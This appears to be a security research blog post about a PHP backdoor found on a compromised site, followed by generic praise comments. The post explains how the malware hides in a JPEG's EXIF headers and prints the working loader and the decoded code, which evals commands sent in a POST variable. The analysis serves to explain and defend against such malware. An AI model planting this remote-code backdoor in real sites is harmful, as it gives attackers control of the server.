Checkout the malware in a JPEG

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. This is what we found in the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');


Both functions are harmless by themselves. Exif_read_data is commonly used to read images and preg_replace to replace the content of strings. However, preg_replace has a hidden and tricky option where if you pass the “/e” modifier it will execute the content (eval), instead of just searching/replacing.

When we look at the bun.jpg file, we find the second part of the backdoor:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

The file starts normally with the common headers, but in the “Make” header it has a strange keyword: “/.*/e”. That’s the exact modifier used by preg_replace to execute (eval) whatever is passed to it.

Now things are getting interesting…

If we keep looking at the EXIF data, we can see the “eval ( base64_decode” hidden inside the “Model” header. When you put it all together, we can see what is going on. The attackers are reading both the Maker and Model header from the EXIF and filling the preg_replace with them. Once we modify the $exif[‘Make’] and $exif[‘Model’] for what is in the file, we get the final backdoor:

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

Once decoded, we can see that it just executes whatever content is provided by the POST variable zz1. The full decoded backdoor is here:

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..
Steganography Malware

Another interesting point is that bun.jpg and other images that were compromised, still load and work properly. In fact, on these compromised sites, the attackers modified a legit, pre-existent image from the site. This is a curious steganographic way to hide the malware.

11 thoughts on “Checkout the malware in a JPEG

  1. Thanks for sharing your info. I really appreciate your efforts and I will be waiting for your next write ups thanks once again.

  2. Just wish to say your article is as amazing. The clarity on your
    put up is simply excellent and that i can think you’re knowledgeable
    in this subject. Fine with your permission let me
    to grasp your RSS feed to stay updated with approaching post.
    Thanks 1,000,000 and please carry on the gratifying
    work.

  3. It’s the best time to make a few plans for the longer term and it is time to be happy.
    I’ve read this post and if I could I desire to recommend you few fascinating things or advice.
    Perhaps you could write subsequent articles relating to this article.
    I desire to read more things approximately it!

  4. I do not even understand how I ended up here, however I
    thought this put up used to be great. I don’t realize
    who you’re but certainly you’re going to a famous blogger if you aren’t already.
    Cheers!

  5. I am really impressed together with your writing skills and
    also with the layout for your blog. Is that this a paid theme or did you modify it yourself?

    Anyway stay up the excellent high quality writing,
    it’s uncommon to see a nice weblog like this one these days..

  6. What’s up to every one, the contents present at this site are really amazing for
    people knowledge, well, keep up the good work fellows.

  7. My family all the time say that I am wasting my time here at net, except I know I am getting
    knowledge every day by reading thes nice articles or reviews.

  8. Every weekend i used to go to see this website, as i want enjoyment, since
    this this web page conations really nice funny data too.

  9. My brother recommended I might like this website.
    He was entirely right. This post truly made my day.
    You cann’t imagine simply how much time I had spent for
    this info! Thanks!

  10. Hey There. I found your blog using msn. This is an extremely well written article.

    I’ll make sure to bookmark it and come back to read more of your useful info.
    Thanks for the post. I’ll definitely return.

Leave a Reply

Your email address will not be published. Required fields are marked *